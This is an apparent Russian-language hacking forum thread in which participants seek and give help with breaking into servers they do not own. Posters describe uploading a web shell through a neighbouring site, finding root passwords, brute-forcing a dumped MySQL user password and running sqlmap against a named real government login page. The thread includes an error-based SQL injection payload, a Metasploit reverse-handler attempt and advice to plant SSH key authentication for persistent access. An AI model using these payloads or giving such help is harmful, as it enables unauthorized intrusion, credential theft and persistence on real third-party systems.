Не установится соединение. В широком смысле, на больших дистанциях спуфинг в tcp крайней сложно реализуем. Попробуйте зайти с другой стороны, субд, фтп, ссх и прочее.
Пробовал. СУБД локально доступна только через инъекцию (прав на запись нет), удаленно - не настроен сервис в принципе. FTP отгорожен полностью через hosts.deny, ssh доступен лишь для нескольких айпи адресов через hosts.allow/deny. Каких-либо уязвимостей на исполнение кода в коде сайта найти не удалось. Наружу смотрят лишь Postfix, Dovecot, Apache и Webmin. На руках лишь чтение общих файлов системы через php и select инъекция для mysql. Самое обидное то, что в отличие от другого сайта, где у меня есть шелл, но нет возможности поднять привилегии, этот сайт, судя по версии ядра, очень хорошо рутается.
Аналогично, пробовал Изначально у меня был один сайт, про который я и писал сейчас. Через конфиги узнал, что у него есть "зеркало" на отдельном сервере (тестовая версия), на котором еще было много соседних сайтов, один из которых был уязвим, что позволило залить шелл на второй сервер и сделать копию интересуемого сайта для более полного анализа. К сожалению, новых уязвимостей на первом сайте/сервере найти все равно не удалось.
Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле) Для проверки сайта на скули обязательно урл вида ,т.е обязательно урл должен заканчиваться на значение параметра? Просто на данном сайте всё переименовано,для красоты или же в целях безопасности) Если возможно поподробнее)
Спс керберус)где почитать не подскажешь? Просто там страницы типа,а в мануалах значения =1 =4 и тд) Как проверить на скули?Web-Cruiser-lol P.S Плюхи раздал
Знатоки!! Помогите раскрутить одну SQL. URL привести не могу, вот полный SQL запрос: Code: SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2 dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE] Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю: Code: (1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A) И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key' Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом: Code: SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2 dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle (1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELECT COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA.TABLES) GROUP BY 2)A) Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist И как бы я не крутил SQL, от неё избавиться никак не могу. Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц. Спасибо.
ребята подскажите в чем проблема и как ее исправить, какие опции лучше поставить в sqlmap, сканер показал что есть слепые, причем многочисленные, но когда начинаю работать sqlmap,ом выдает после работы ошибку [WARNING] HTTP error codes detected during run: 403 (Forbidden) - 253 times, 500 (Internal Server Error) - 105 times линк https://login01.stockholm.se/siteminderagent/formsja/DynamicRetry.fcc POST SMENC=SHIFT_JIS&SMLOCALE=JP-jp&USER=&PASSWORD=&target=&smauthreason=&smagentname=%27+and+%27f%27%3D%27f%27+--+&postpreservationdata= помогите люди советом и подсказкой
Здраствуйте, изучаю metasploit. пытаюсь создать соединение с удаленным доступом, используя экзешник, и хандлер.Локально все работает прекрасно, но увы, глобально нет. Hadler failed to bind . пробовал и на виртуалке, и грузится с флешки, все равно так. порты открыты, пробовал менять и 4444 и 5555 итд..не получается.можете что-нибудь посоветовать?
Такой вопрос, наверно банальный, но пока не дошло. Мне каким-то невероятный чудом удалось найти пароль от юзера, который с высокой долей вероятностью обладает правами суперюзера. Насколько я знаю, узнать наверняка, является ли он суперюзером, это попытаться выполнить какую-нибудь команду через sudo. Проблема в том, что мой шелл - я пробовал https://github.com/creaktive/tsh - почему-то все равно не дружит с sudo, хотя вроде как есть имитация tty (sorry, you must have a tty to run sudo shell). Какой шелл дружит с sudo или как иначе проверить судошность аккаунта? Upd: рядом лежал пароль от рута, так что вопрос о судо частично отпал, но все равно интересно, как же можно было поступить Жаль, пароль не подходит для логина на основном сервере, только для зеркала, но возможно я смогу найти что-нить еще.
Правами суперюзера обладает только суперюзер - ваш кэп. Tty-like != tty, хотя есть обработчики su\sudo, сам такой когда-то писал. Вы, вероятно, забыли про ssh. Коннектитесь, проверяйте. Если доступ есть со стороны шелла, но нет пароля, просто допишите авторизацию по сертификатам.
Ну, мб я не совсем корректно выразился, возможно я просто неточно знаю механику работы sudo. Так или иначе, с паролей рута я смог просто использовать su -c 'cmd' root Про ssh я не забывал, я просто не мог им пользоваться из-за фильтрации адреса.
У меня тут такая проблема: я взломал сервак, слил оттуда таблицу mysql.users. В ней был юзер с привелегией на удаленное подключение (% в колонке Host). Я сбрутил его пароль и стал пробовать подключиться к базе. Пробил IP сайта и сделал следующее: PHP: <?php $link = mysql_connect('<IP сервака>', '<логин>', '<пароль>'); f (!$link) { die('Could not connect: ' . mysql_error()); } echo 'Connected successfully'; mysql_close($link); ?> Оно выдает: Could not connect: Попытка установить соединение была безуспешной, т.к. от другого компьютера за требуемое время не получен нужный отклик, или было разорвано уже установленное соединение из-за неверного отклика уже подключенного компьютера. В чем моя ошибка?
Есть вероятность, что установлена фильтрация айпи-адреса. Проверь /etc/hosts.allow и /etc/hosts.deny. Плюс, может быть там используется нестандартный номер порта (если вообще mysql настроена принимать удаленные подключения). Подключение идет локально на сервере или от себя (я так полагаю, что удаленно, просто использовать php для этого несколько странно)?
